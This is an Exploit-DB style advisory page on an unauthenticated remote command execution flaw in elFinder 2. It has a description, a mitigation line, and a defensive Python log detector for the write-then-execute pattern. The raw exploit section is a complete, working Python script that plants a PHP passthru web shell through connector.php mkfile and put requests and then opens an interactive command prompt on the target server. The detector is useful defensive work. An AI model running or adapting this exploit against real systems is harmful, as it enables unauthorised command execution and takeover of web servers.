vendor: elFinder
by: TUNISIAN CYBER
CVSS: 9.3 (HIGH)
Type: Remote Command Execution
CWE: 78
Product Name: elFinder
Affected Version From: 2
Affected Version To: 2.1.47
Patch Exists: YES
Related CWE: N/A
CPE: 2.1.47:elFinder
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: KaliLinux (Debian)
2015

elFinder 2 Remote Command Execution (Via File Creation) Vulnerability

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of elFinder. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of the 'cmd' parameter. By creating a file with a crafted name, an attacker can inject arbitrary code into the application. An attacker can leverage this vulnerability to execute code under the context of the web server.

Mitigation:

Upgrade to the latest version of elFinder (the affected range listed above ends at 2.1.47 and a patch exists).
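The description above boils down to a two-step pattern in the web server's access log: an unauthenticated write through connector.php (cmd=mkfile with an executable file name, or cmd=put against a target hash that decodes to one) followed by a request for that script under the files directory. The detector below is an added example written for this page, not part of the Exploit-DB entry; the log lines are constructed, and the hash decoding assumes the `l1_<base64>` layout implied by the advisory's target=l1_Lw (which decodes to `/`).

```python
import base64
import re
from urllib.parse import parse_qs, unquote, urlparse

# Constructed sample access-log lines (not from the page); paths mirror the advisory's URLs.
SAMPLE_LOG = """\
203.0.113.5 - - [06/May/2015:10:00:01 +0000] "GET /elfinder/php/connector.php?cmd=mkfile&name=shell.php&target=l1_Lw HTTP/1.1" 200 88
203.0.113.5 - - [06/May/2015:10:00:02 +0000] "GET /elfinder/php/connector.php?cmd=put&target=l1_c2hlbGwucGhw HTTP/1.1" 200 120
203.0.113.5 - - [06/May/2015:10:00:05 +0000] "GET /admin/js/plugins/elfinder/files/shell.php?cmd=id HTTP/1.1" 200 54
198.51.100.9 - - [06/May/2015:10:01:00 +0000] "GET /elfinder/php/connector.php?cmd=open&target=l1_Lw HTTP/1.1" 200 910
198.51.100.9 - - [06/May/2015:10:01:02 +0000] "GET /admin/js/plugins/elfinder/files/report.pdf HTTP/1.1" 200 4096
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<url>\S+)')
EXEC_EXT = ('.php', '.phtml', '.phar', '.php5')
WRITE_CMDS = {'mkfile', 'put', 'upload', 'rename', 'paste', 'extract'}

def decode_hash(h):
    # Assumed elFinder hash layout: '<volume>_' + base64 with +/= mapped to -_. (so l1_Lw is '/')
    enc = h.partition('_')[2].replace('-', '+').replace('_', '/').replace('.', '=')
    enc += '=' * (-len(enc) % 4)
    try:
        return base64.b64decode(enc).decode('utf-8', 'replace')
    except ValueError:
        return ''

def analyze(log_text):
    """Map ip -> [(reason, url)] for requests matching the write/execute pattern."""
    findings = {}
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, url = m['ip'], m['url']
        parsed = urlparse(url)
        qs = {k: v[0] for k, v in parse_qs(parsed.query).items()}
        path = parsed.path.lower()
        if path.endswith('/connector.php') and qs.get('cmd') in WRITE_CMDS:
            # the file name arrives as 'name' (mkfile) or inside the target hash (put)
            name = unquote(qs.get('name', '')) or decode_hash(qs.get('target', ''))
            if name.lower().endswith(EXEC_EXT):
                findings.setdefault(ip, []).append(('connector wrote executable file', url))
        elif '/files/' in path and path.endswith(EXEC_EXT):
            findings.setdefault(ip, []).append(('script served from upload directory', url))
    return findings

def escalated(findings):
    """IPs that both wrote an executable via the connector and then requested one."""
    return sorted(ip for ip, hits in findings.items()
                  if len({r for r, _ in hits}) == 2)
```

Parameters sent in a POST body (as the exploit does for its put request) never reach a standard access log, so the second rule, any request for a PHP file under the files directory, is the one that still fires without body logging at the proxy. Denying script execution for that directory in the web server configuration removes the execution step regardless of how the file got there.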

Exploit-DB raw data:

#[+] Author: TUNISIAN CYBER
#[+] Title: elFinder 2 Remote Command Execution (Via File Creation) Vulnerability
#[+] Date: 06-05-2015
#[+] Vendor: https://github.com/Studio-42/elFinder
#[+] Type: WebAPP
#[+] Tested on: KaliLinux (Debian)
#[+] Twitter: @TCYB3R
#[+] Time Line:
#    03-05-2015:Vulnerability Discovered
#    03-05-2015:Contacted Vendor
#    04-05-2015:No response
#    05-05-2015:No response
#    06-05-2015:No response
#    06-05-2015:Vulnerability published

import cookielib, urllib
import urllib2
import sys

print"\x20\x20+-------------------------------------------------+"
print"\x20\x20| elFinder Remote Command Execution Vulnerability |"
print"\x20\x20|                 TUNISIAN CYBER                  |"
print"\x20\x20+-------------------------------------------------+"


host = raw_input('\x20\x20Vulnerable Site:')
evilfile = raw_input('\x20\x20EvilFileName:')
path=raw_input('\x20\x20elFinder s Path:')


tcyber = cookielib.CookieJar()
opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(tcyber))

create = opener.open('http://'+host+'/'+path+'/php/connector.php?cmd=mkfile&name='+evilfile+'&target=l1_Lw')
#print create.read()

payload = urllib.urlencode({
                            'cmd' : 'put',
                            'target' : 'l1_'+evilfile.encode('base64','strict'),
                            'content' : '<?php passthru($_GET[\'cmd\']); ?>'
                            })

write = opener.open('http://'+host+'/'+path+'/php/connector.php', payload)
#print write.read()
print '\n'
while True:
    try:
        cmd = raw_input('[She3LL]:~# ')

        execute = opener.open('http://'+host+'/'+path+'/admin/js/plugins/elfinder/files/'+evilfile+'?cmd='+urllib.quote(cmd))
        reverse = execute.read()
        print reverse;

        if cmd.strip() == 'exit':
            break

    except Exception:
        break

sys.exit()